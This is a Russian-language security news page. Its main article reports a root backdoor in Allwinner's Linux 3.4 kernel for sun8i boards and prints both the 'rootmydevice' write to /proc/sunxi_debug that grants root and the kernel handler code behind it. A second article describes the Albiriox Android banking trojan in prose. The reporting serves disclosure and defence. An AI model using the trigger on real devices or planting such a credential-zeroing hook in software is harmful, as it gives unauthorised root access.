Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Александр Панасенко 10 Мая 2016 - 17:58

...

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Разработчики Linux-дистрибутива Armbian обратили внимание на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".

   $ id
   uid=1000(user) gid=1000(user) 
   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
   $ id
   uid=0(root) gid=0(root)

Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner H3, A83T и H8, включая Orange Pi, FriendlyARM, SinoVoip M2+ и M3 Banana Pi, Cubietruck и LinkSprite pcDuino8 Uno, пишет opennet.ru.

Для предоставления прав root в обработчике sunxi_proc_su_write используется следующий код, выставляющий привилегии root текущему процессу:

        if(!strncmp("rootmydevice",(char*)buf,12)){
		cred = (struct cred *)__task_cred(current);
		cred->uid = 0;
		cred->gid = 0;
		cred->suid = 0;
		cred->euid = 0;
		cred->euid = 0;
		cred->egid = 0;
		cred->fsuid = 0;
		cred->fsgid = 0;
		printk("now you are root\n");
	}

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива Armbian 5.10.

Следующая главная новость »

Подписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Екатерина Быстрова 01 Декабря 2025 - 12:23

Android Трояны Домашние пользователи

Albiriox: новый троян для Android крадёт деньги из банковских приложений

Исследователи из Cleafy обнаружили новую опасную вредоносную программу для Android — Albiriox. Это свежий банковский зловред, который уже называют одним из самых мощных за последнее время. Он нацелен на пользователей банковских приложений и криптовалютных сервисов по всему миру.

Albiriox распространяется по модели «вредонос как услуга» (MaaS): злоумышленники могут просто «арендовать» его за $650-720 в месяц.

Впервые специалисты Cleafy обратили внимание на активность Albiriox в сентябре 2025 года — тогда он тестировался в закрытом бета-режиме и распространялся только среди «уважаемых» участников киберпреступных форумов. К октябрю доступ стал публичным.

По данным исследователей, за проектом стоят русскоязычные киберпреступники: на это указывают и язык общения, и инфраструктура, и активность на форумах. Всего за пару месяцев вредонос вырос из закрытой беты в полноценный коммерческий инструмент — с рекламными роликами, «презентациями» и продвижением в Telegram.

Схема заражения довольно хитрая. Сначала жертве приходит СМС со ссылкой на поддельный сайт, маскирующийся под Google Play Store или популярные ретейл-приложения. Пользователь думает, что скачивает настоящее приложение, — а на деле устанавливает «дроппер», который потом подтягивает основной зловред.

После установки Albiriox показывает фальшивый экран «системного обновления» и просит разрешение на установку приложений из неизвестных источников. Получив его, вредонос разворачивает основной модуль и получает полный контроль над устройством.

Albiriox сочетает два мощных метода атаки:

удалённый доступ через VNC — злоумышленник видит экран телефона и может делать всё, что делает пользователь: нажимать кнопки, вводить текст, открывать приложения;
оверлеи — поверх банковских приложений накладываются фальшивые формы входа, чтобы украсть логины, пароли и другие данные.

Помимо этого, зловред может показывать чёрный экран, чтобы скрыть действия злоумышленников, пока они совершают несанкционированные операции.

Целью Albiriox стали более 400 финансовых приложений: банки, криптобиржи, кошельки, платёжные сервисы в разных странах. С точки зрения масштаба это явно инструмент для глобальных мошеннических кампаний.

Чтобы обходить защиту, вредонос использует собственный билдер, интегрированный с сервисом шифрования Golden Crypt, а также специальный метод потоковой передачи экрана через специальные возможности ОС (Accessibility Services) — это позволяет получать данные даже из тех банковских приложений, которые блокируют запись экрана.

Первые реальные атаки уже зафиксированы. Один из ранних случаев был в Австрии — жертв заманивали поддельной страницей Penny Market и СМС-сообщениями с укороченными ссылками.

Эксперты напоминают:

скачивать приложения стоит только из официальных магазинов;
не переходить по ссылкам из СМС и мессенджеров;
держать систему обновлённой;
включать двухфакторную аутентификацию;
использовать мобильные средства защиты.

По мнению специалистов, Albiriox — представитель нового поколения Android-банковских зловредов. Модель MaaS и активное развитие делают его особенно опасным — и есть риск, что в ближайшие месяцы он получит ещё большее распространение.

Обнаружен бэкдор в отладочном коде ядра Linux для систем Allwinner

Читайте также